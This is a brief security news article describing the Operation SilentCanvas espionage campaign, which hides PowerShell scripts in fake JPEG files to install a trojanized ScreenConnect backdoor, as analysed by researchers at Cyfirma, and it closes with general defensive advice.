How the Attack Works
A cyber espionage campaign named Operation SilentCanvas is targeting Windows computers by disguising malicious PowerShell scripts as JPEG image files. The attack begins when a victim receives a file named sysupdate.jpeg through phishing emails, fake update prompts, or file sharing links. Although the file has a .jpeg extension, it contains no real image data. Instead, it holds a PowerShell script that creates a hidden folder on the system and downloads additional malicious components from attacker controlled servers.
Once the initial script runs, the malware retrieves a trojanized version of ConnectWise ScreenConnect, a legitimate remote access tool commonly used in enterprise environments. The altered version provides attackers with a persistent hidden back door while blending in with trusted software already present on the system. The malware also uses a fileless technique to gain elevated privileges without triggering visible security warnings, abusing a trusted Windows binary to bypass User Account Control prompts.
Impact and Scope
The campaign chains together multiple advanced techniques to evade detection. The malicious file omits the standard image header that all real JPEG files carry, so Windows does not flag it as a script. Dangerous command strings are reconstructed at runtime rather than written plainly in the file, helping the malware avoid antivirus detection. A secondary payload named access.jpeg runs directly in memory, leaving no suspicious executable on the disk. Researchers at Cyfirma identified and analyzed the full attack chain, showing how the intrusion reaches deep into targeted environments. Organizations using remote access tools should review their security controls and user awareness training to defend against such file based deception attacks.
Source: Cyber Security News
